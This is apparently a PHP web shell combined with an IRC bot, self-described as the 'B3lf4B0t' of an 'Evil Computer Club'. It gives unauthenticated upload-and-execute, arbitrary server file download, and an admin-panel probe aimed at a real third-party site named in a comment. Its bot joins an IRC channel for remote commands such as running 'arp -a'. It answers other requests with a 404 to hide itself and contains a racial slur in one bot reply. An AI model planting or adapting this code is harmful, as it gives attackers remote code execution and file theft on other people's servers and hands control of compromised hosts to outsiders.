<?php

//php -S localhost:8000

//parse_str(implode('&', array_slice($argv, 1)), $_GET); //tmp

//$_POST['c'] = 'adminpanel';
//$_POST['c_args'] = base64_encode('https://www.enpafirenze.it/cms/');

/////////////////////////////////////////////////////////////////////////////////

$config = '
	$named_path = "";
	$dropbear_pid = "";
	$tor_pid = "";
	$ngircd_pid = "";
	$irc_pid = "";
	$irc_nickname = "dabot";
	$irc_servers = array("irc.autistici.org:6697");
	$irc_channels = array("#ecc");
	$irc_master = "daMaster";
';

//eval(base64_decode($config));

function post_request($url, $data) {
	//$url = 'http://server.com/path';
	//$data = ['key1' => 'value1', 'key2' => 'value2'];
	$headers = ["Content-type: application/x-www-form-urlencoded"];
	$options = [
		'http' => [
		    'header' => $headers,
		    'method' => 'POST',
		    'content' => http_build_query($data),
		    'ignore_errors' => true,
		],
	];
	$context = stream_context_create($options);
	$response = file_get_contents($url, false, $context);
	if ($response) {
		return $response;
	} else {
	    return false;
	}
}

function get_http_response_code($url) {
	$context = stream_context_create([
		'ssl' => [
			'verify_peer' => false,
			'verify_peer_name' => false
		]
	]);
    $headers = get_headers($url, false, $context);
    return substr($headers[0], 9, 3);
}

function findadminpanel($url, $wordlistfile='') {
	$wordlist  = ['cms', 'admin/', 'backend', 'administrator/'];

	foreach($wordlist as $i) {
		$totest = "$url$i";
		if(get_http_response_code($totest) != "404"){
			echo "[SUCCESS] - $totest \n";
			return $totest;
		}	
	}
	return false;
}

function download($file) {

	$filename = basename($file);
	$mime_type = mime_content_type($file);
	header('Content-type: '.$mime_type);
	header('Content-Disposition: attachment; filename="'.$filename.'"');
	readfile($file);		

}

function ircbot() {
	// Prevent PHP from stopping the script after 30 sec
	set_time_limit(0);

	$lockfile = './ngpid.lock'; 

	if(!is_file($lockfile)){
		file_put_contents($lockfile, '666666666');     // Save our content to the file.
	}

	$pid = file_get_contents($lockfile); 
	if (posix_getsid((int)$pid) === false) { 
	   print "process has died! restarting...\n"; 
	   file_put_contents($lockfile, getmypid()); // create lockfile 
	} else { 
	   print "PID " . $pid . " is still alive! can not run twice!\n"; 
	   exit; 
	} 

	$context = stream_context_create([
		'ssl' => [
		    'verify_peer' => false,
		    'verify_peer_name' => false
		]
	]);

	$channels  = array('#asdasd');
	$nickname = 'c4rl0';
	// $password = 'secret';
	$master   = 'Hammster';
	$servers  = array('127.0.0.1:6697');

	foreach($servers as $hostname) {
		$socket = stream_socket_client($hostname, $errno, $errstr, ini_get("default_socket_timeout"), STREAM_CLIENT_CONNECT, $context);
		if ($socket) {
		  echo "connected to " .  $hostname . "\n";
		  break;
		} else {
		  echo 'cant connect to ' .  $hostname . "\n";
		}
	}
	if (! $socket) {
	   echo 'cant connect';
	   exit;
	}

	$connection_tries = 0;
	$connection_registered = false;

	while (1) {

		if ($connection_registered) {
		    break;
		}

		fputs($socket, "NICK " . $nickname . "\n");
		fputs($socket, "USER " . $nickname . " 0 * :" . $master . "'s Bot\n");
		    
		while ($data = fgets($socket, 128)) {
		    echo $data;
		    flush();
		    
		    $ex = explode(' ', $data);
		    
		    if ($ex[0] == "PING") {
		        fputs($socket, "PONG " . $ex[1] . "\n");
		    }		    
		    if ($ex[1] == "433") {
		        $nickname = 'buba';
		        break;
		    }		    
		    if ($ex[1] == "001") {
		        $connection_registered = true;
		        break;
		    }		    
		    if (!$connection_registered && $connection_tries == 5) {
		        echo 'too many tries (' .$connection_tries.')';
		        exit;
		  	}
		}		
		$connection_tries++;
	}

	sleep(2);

	foreach($channels as $channel) {
	   fputs($socket, "JOIN " . $channel . "\n");
	}

	// Force an endless while
	while (1) {
		// Continue the rest of the script here
		while ($data = fgets($socket, 128)) {
		    $is_pvt = false;
		    $sender = '';
		    $recipient = '';
		    
		    echo $data;
		    flush();
		    
		    // Separate all data
		    $ex = explode(' ', $data);
		    
		    // Send PONG back to the server
		    if ($ex[0] == "PING") {
		        fputs($socket, "PONG " . $ex[1] . "\n");
		    }
		    
		    // executes chat command
		    if ($ex[0] != 'PING' && ISSET($ex[3])) {
		        $command = str_replace(array(
		            chr(10),
		            chr(13)
		        ), '', $ex[3]);
		        
		        if($ex[2] == $nickname) {
		            $sender = explode('!', $ex[0]);
		            $sender = str_replace(':', '', $sender);
		            $is_pvt = true;
		            $recipient = $sender[0];
		        } else {
		            $recipient = $ex[2];
		        }
		                    
		        if($command == ":!md5") {
		            if (ISSET($ex[4])) {
		                $ex[4] = preg_replace('~(*BSR_ANYCRLF)\R~', "", $ex[4]);
		                $hashed = hash('md5', $ex[4]);
		                fputs($socket, "PRIVMSG " . $recipient . " :" . $hashed . " \n");
		            } else {
		                fputs($socket, "PRIVMSG " . $recipient . " :[ERROR] missing argument \n");
		            }
		        }            
		        if($is_pvt && $command == ":!arp") {
		            $out = system('arp -a');
		            foreach(preg_split("/((\r?\n)|(\r\n?))/", $out) as $line){
		                fputs($socket, "PRIVMSG " . $recipient . " :" . $line . " \n");
		            } 
		        }
		        if ($command == ":!alive?") {
		            fputs($socket, "PRIVMSG " . $recipient . " :whazzup nigga? \n");
		        }
		        if ($command == ":!time") {
		            fputs($socket, "PRIVMSG " . $recipient . " :" . date(DATE_RFC2822) . " \n");
		        }
		        if ($is_pvt && $command == ":!help") {
		            fputs($socket, "PRIVMSG " . $recipient . " :B3lf4B0t v. 0.1 - E.C.C. - Evil Computer Club \n");
		            fputs($socket, "PRIVMSG " . $recipient . " :!alive?, !time, !slave, !md5, !arp \n");
		        }
		        if ($command == ":!slave") {
		            
		            $parts = explode("!", $ex[0]);
		            $user  = substr($parts['0'], 1);
		            
		            if ($user == $master)
		                fputs($socket, "PRIVMSG " . $recipient . " :Yes master! \n");
		            else
		                fputs($socket, "PRIVMSG " . $recipient . " :get lost " . $user . " you filthy infidel! \n");
		        }		        
		        if ($command == ":!crackmd5") {
		            echo "$recipient \n";
		            if (ISSET($ex[4])) {
						echo implode(' ', array_slice($ex, 4, -1));
					}
		        } //if ($is_pvt && $command == ":!crackmd5")
		        
		    } //if ($ex[0] != 'PING' && ISSET($ex[3]))
		} //while ($data = fgets($socket, 128))
	} //while(1)
} //function ircbot() 


//main


if(isset($_GET['c'])) {
    $cmd = $_GET['c'];
    
    if ( $cmd == 'irc') {
        ircbot();
    } 
    
    if ( $cmd == 'upload') {
        echo '
        <!DOCTYPE html>
        <html>
        <head>
          <title>Upload your files</title>
        </head>
        <body>
          <form enctype="multipart/form-data" action="' . basename($_SERVER["SCRIPT_FILENAME"]) . '" method="POST">
            <p>Upload your file</p>
            <input type="hidden" name="c" value="upload"></input>
            <input type="file" name="uploaded_file"></input><br />
            <input type="checkbox" name="exec" value="exec"> Exec after upload</input><br />            
            <input type="submit" value="Upload"></input>
          </form>
        </body>
        </html>';
    }

    if ( $cmd == 'download') {
		if (isset($_GET['f']) && !empty($_GET['f'])) {
			$f = $_GET['f'];
			$filename = basename($f);
			$mime_type = mime_content_type($f);
			header('Content-type: '.$mime_type);
			header('Content-Disposition: attachment; filename="'.$filename.'"');
			readfile($f);		
		}
    }
} 
elseif (isset($_POST['c'])) {
	$cmd = $_POST['c'];

    if ( $cmd == 'upload') {
		if (!empty($_FILES['uploaded_file'])) {
			$path = "./";
			$path = $path . basename( $_FILES['uploaded_file']['name']);

			if(move_uploaded_file($_FILES['uploaded_file']['tmp_name'], $path)) {
				echo'<pre>';
				echo "The file ".  basename( $_FILES['uploaded_file']['name']). " has been uploaded \n";
			if (chmod($path, 0755)) {
				echo "Chmod +x done \n";
			}
			if (isset($_POST['exec'])) {
				if ($_POST['exec'] == "exec") {
					echo $path;
					system('./'.$path);
					//system('ls -al');
				}
			}
			echo'</pre>';
			} else{
				echo "There was an error uploading the file, please try again!";
			}
		}
	}

    if ( $cmd == 'adminpanel') {
		if (!empty($_POST['c_args'])) {
			$c_args = base64_decode($_POST['c_args']);
			findadminpanel($c_args);
		} else {
			http_response_code(404);
			exit;
		}
	}

    if ( $cmd == 'hashkiller') {
		if (!empty($_POST['c_args'])) {
			$c_args = base64_decode($_POST['c_args']);
			hashkiller($c_args);
		} else {
			http_response_code(404);
			exit;
		}
	}
	
} 
else {
    http_response_code(404);
}


?>